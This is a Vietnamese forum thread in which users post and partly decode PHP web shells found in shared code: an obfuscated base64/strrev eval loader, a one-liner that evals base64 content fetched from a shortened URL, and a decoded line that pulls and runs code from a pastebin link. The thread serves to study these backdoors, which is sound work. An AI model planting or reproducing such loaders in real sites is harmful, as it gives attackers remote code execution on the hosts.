Em mới tìm thấy vài con shell trong các bộ code share trên mạng

[dyplax]

Các thánh cùng xem con shell này có thể làm gì và các giải mã của nó đc ko ạ ??

<?php //--GT--// 
 
$_F=__GT__; define($_F, strrev('edoced_46esab')); $_X="A0zBy+CxDw=EvFuG4tHs7IrJq8KpLoM3nNm5OlPk2QjRiS6hTg9UfVe1WdXcY-bZa"; define($_F, strrev('edoced_46esab')); $_Y="KbTkKN-5+aZPRaZPADy5QUu6IEIzQqIHQwZuK4VlWJliWJ58+qGGKsan0MpS0Eun0CIvyqu9xgE9x6mnLYa3X7IhyDJGKsanA6IZ+W5fON-t+NIpyMp9OM3fzsuYyC+9+gt1Kq8u=405=VEIzD8nL1ZPQgxpxWmGKsa8+qG5Qgwt0X8iWJ58zMUhmYauRg0f+gE9PXx3yCQlzqT1mWV9+gt1QY1GQN+nP4S3XM0N+MpZ0sG8zMUhmY180qEZmY8iWJlMyqdf+qF5Qgotz4mlL1ZP0D35zYanK6aGyDdl0qTuRM3pznIp+7RG0gpYKsQSx6R7KrdMzqoZRg0tyqFuRpItAguhysRG+qpH04Z7m7RcFgUrAY-4AgESzX-FAXyrmrRZLqo5RVmMRbRZ3Wh90b1f0Mu9xWTGO7TG4N-pz7-4AgESzX-zRWdtRgtY0DyuR8wt+Mpfzra1mso1A6a7R6It+MxpxWZ7CqQSyDojRroDQ7mYmrJizY-4AgESzW1fy4TGC41f0Mu9xWTkONacQbS3XnZ3Xrkc"; $_zincode=($_F ? __GT__:NULL); eval($_zincode(strrev("=sDM9k1XkowOw0DWfRiC7ATPS9FJKsTKZ9FJowWY2VmC7kSWfRCLiciIuY0Xk4iInICLn81X5FGUlRXYH91XngSZjFGbwVmcfdWZyVWPS9FJKsTKZ9FJoUGZvNWZk9FN2U2chJWPZ9FJKsTKY9FJskCWfRCK2VmcyR3cgwSWfRCKyRnc0NXPZ9FJ")));
?>

tiếp nữa :V

<?php /* pass = khariwalkaz@%hacking */ $A=file_get_contents('https://goo.gl/6s46Lg'); eval(base64_decode($A));?>

Các thánh chỉ giáo em với ạ :'( em đang tìm hiểu về cách tấn công và cách phòng trách cho các web hay host cùi

 

Mình lại thấy đây là 2 hàm php bình thường hàm đầu dùng để mã hóa dữ liệu còn hàm sau giải mã.

 

Mình lại thấy đây là 2 hàm php bình thường hàm đầu dùng để mã hóa dữ liệu còn hàm sau giải mã.

mình up thử lên host và xem thử rồi nhé :V
shell 100%

 

${"GLOBLS"}["wwzlwsv"]="Mrion00";${${"GLOBALS"}["wwzlwsvc"]}=fiel_get_contents("http://pastebin.com/raw/tVRt1K5D");$vvpmto="Marion01";eval(${$vvpmto});

Con shell của nó load về đây bạn trẻ

Mình đang dùng đt nên ko thử hết các link liên tục của nó được. Nhưng về cơ bản nó sẽ liên tục gọi biến để load về một con shell được up từ Paste.bin
Cái thằng viết ra con shell này cũng khá thông minh đấy . Điều tra link như vầy sẽ rất khó khăn :v.

 

Nếu shell này liên tục load về các file có dung lượng lớn thì khá phiền phức :3. Xem như một kiểu Dos trực tiếp :3.

 

Nếu shell này liên tục load về các file có dung lượng lớn thì khá phiền phức :3. Xem như một kiểu Dos trực tiếp :3.

nó load 1 lần xong nó xóa hết code và shell của nó sau đó deface cũng đủ chết rồi bác ạ :V